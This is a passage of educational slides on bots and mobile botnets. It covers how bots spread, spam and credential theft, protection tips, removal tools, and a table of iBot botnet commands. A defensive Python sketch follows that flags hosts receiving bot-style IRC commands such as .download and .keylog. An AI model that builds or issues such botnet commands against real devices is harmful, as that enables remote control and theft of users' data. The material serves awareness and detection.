  • 22. HOW BOTS WORK? Bots creep into a person’s computer in many ways. Bots often spread themselves across the internet by looking for vulnerable, unprotected computers to infect. When they find an exposed computer, they quickly infect the machine and then report back to their master. Their goal is then to stay hidden until they are instructed to carry out a task.
  • 23. AUTOMATED TASKS BY BOTS
      Sending: They send → Spam → Viruses → Spyware
      Stealing: They steal personal and private information and communicate it back to the malicious user: → Bank credentials → Credit card numbers → Sensitive information
      Denial of Service: Launching denial of service (DoS) attacks against a specified target.
      Click fraud: Fraudsters use bots to boost web advertising billings by automatically clicking on internet ads.
  • 24. PROTECT AGAINST BOTS Limit your user rights when online. Install top-rated security software. Increase the security settings on your browser. Update automatically to the latest system patches. Configure your software's settings to update automatically. Never click on attachments unless you can verify the source.
  • 25. DETECTION + REMOVAL 1: RUBOTTED 2.0 BETA Monitors our computer for potential infection and suspicious activities associated with bots. Rubotted protects our system by continuously monitoring our computer for potential infection and suspicious activities. → downloadcenter.trendmicro.com
  • 26. DETECTION + REMOVAL 2: MALICIOUS SOFTWARE REMOVAL TOOL Checks our computer for infection by specific, prevalent malicious software and removes the infection if it is found. Microsoft releases an updated version of this tool on the second Tuesday of each month. → microsoft.com
  • 27. DETECTION + REMOVAL 3: NORTON™ POWER ERASER Eliminates deeply embedded and difficult-to-remove crimeware that traditional virus scanning doesn't always detect. Norton Power Eraser is specially designed to aggressively target scamware. → security.symantec.com
  • 28. MOBILE BOTNETS Mobile botnets target smartphones, attempting to gain complete access to the device and its contents as well as providing control to the botmaster. Mobile botnets give admin rights over the compromised mobile devices, enabling hackers to → Send e-mail or text messages → Make phone calls → Access contacts and photos, and more.
  • 29. EXAMPLES OF MOBILE BOTNETS The Dreamdroid malware, which compromised Android devices. The iPhone SMS attack, which affected iPhone + iPad devices. Commwarrior, which affected Symbian series mobile devices. Zitmo, which targeted Blackberry users.
  • 30. CONTROLLING MOBILE BOTNET Some of the botnet commands from the iBot family:
      Command                  Function
      Add Phone Number(s)      Adds numbers to the forwarding list. Commands are forwarded to all bots on the list.
      Set sleep interval       Sets how long the client waits before searching the P2P network for a command.
      Execute shell sequence   Runs a command in the shell.
      Download URL             Downloads a command file from the botmasters.
  • 31. PROTECT AGAINST MOBILE BOTS Install the latest official OS for your smartphone. Avoid pirated apps or apps from untrusted sources. Download apps only from trusted and reputable app stores.
  • 32. DETECTION + REMOVAL: BULLGUARD MOBILE SECURITY 10 Detects and removes malware. Monitors information that is being sent and received. Remotely manages and monitors the smartphone. → bullguard.com
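
The IRC control channel of slide 13 and the command table of slide 21 suggest a simple network-side check; the sketch below is an added example, not part of the original slides. It scans a constructed sensor log for channel messages that open with one of those command names and flags hosts that receive at least two distinct ones. The log format, the host addresses and the treatment of `.find file` / `.key log` as single tokens without the trailing dot are assumptions.

```python
from collections import defaultdict

# Command names from the slide 21 table, normalised for matching (assumption:
# spaces and the trailing dot in the slide text are not part of the token).
BOT_COMMANDS = {".capture", ".download", ".findfile", ".getcdkeys",
                ".keylog", ".open", ".procs"}

# Constructed sensor log: "<internal host> <raw IRC line seen on its session>".
SAMPLE_LOG = """\
10.0.0.5 :alice!a@host.example PRIVMSG #linux :can you .open the door for me?
10.0.0.23 :ctl!x@irc.example PRIVMSG #chan-7 :.download http://files.example/a.bin
10.0.0.23 :ctl!x@irc.example PRIVMSG #chan-7 :.procs
10.0.0.41 :bob!b@host.example PRIVMSG #help :.open is what I typed by mistake
10.0.0.23 PING :irc.example
10.0.0.23 :ctl!x@irc.example PRIVMSG #chan-7 :.key log
"""


def parse_irc(line):
    """Split a raw IRC line into (prefix, verb, params, trailing)."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    verb = parts[0].upper() if parts else ""
    return prefix, verb, parts[1:], trailing if sep else None


def find_suspect_hosts(log_text, min_distinct=2):
    """Map each host to the distinct bot commands it received, if at or above the threshold."""
    seen = defaultdict(set)
    for row in log_text.splitlines():
        host, _, raw = row.strip().partition(" ")
        if not raw.strip():
            continue
        _prefix, verb, _params, trailing = parse_irc(raw.strip())
        words = (trailing or "").split()
        if verb != "PRIVMSG" or not words:
            continue
        # A command must open the message; try one token and two joined tokens
        # so that ".key log" and ".keylog" both match.
        candidates = {words[0], "".join(words[:2])}
        seen[host] |= {c.lower().rstrip(".") for c in candidates} & BOT_COMMANDS
    return {h: sorted(c) for h, c in seen.items() if len(c) >= min_distinct}


if __name__ == "__main__":
    for host, cmds in find_suspect_hosts(SAMPLE_LOG).items():
        print(host, "received bot-style commands:", ", ".join(cmds))
```

Requiring the command to open the message and setting a threshold of two distinct commands keeps ordinary chat, such as the `#linux` and `#help` lines, from flagging a host.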